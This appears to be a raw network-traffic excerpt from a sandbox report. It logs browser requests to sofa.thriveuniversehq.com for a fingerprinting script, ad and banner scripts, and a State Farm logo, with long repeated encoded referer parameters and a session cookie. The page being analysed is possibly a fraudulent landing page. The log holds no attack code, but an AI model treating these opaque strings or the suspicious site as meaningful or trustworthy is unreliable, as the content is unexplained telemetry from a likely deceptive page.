aFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5j
              Source: global trafficHTTP traffic detected: GET /js/fingerprintjs2/1.5.0/fingerprint2.min.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJI
              Source: global trafficHTTP traffic detected: GET /assets/js/mobile-detect.js-master/mobile-detect.min.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5j
              Source: global trafficHTTP traffic detected: GET /utils/banners/banner-bf.js?v=1.04 HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos
              Source: global trafficHTTP traffic detected: GET /assets/images/State-Farm-Logo.png HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
              Source: global trafficHTTP traffic detected: GET /assets/js/ads.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj
              Source: global trafficHTTP traffic detected: GET /people/5.jpg HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYg
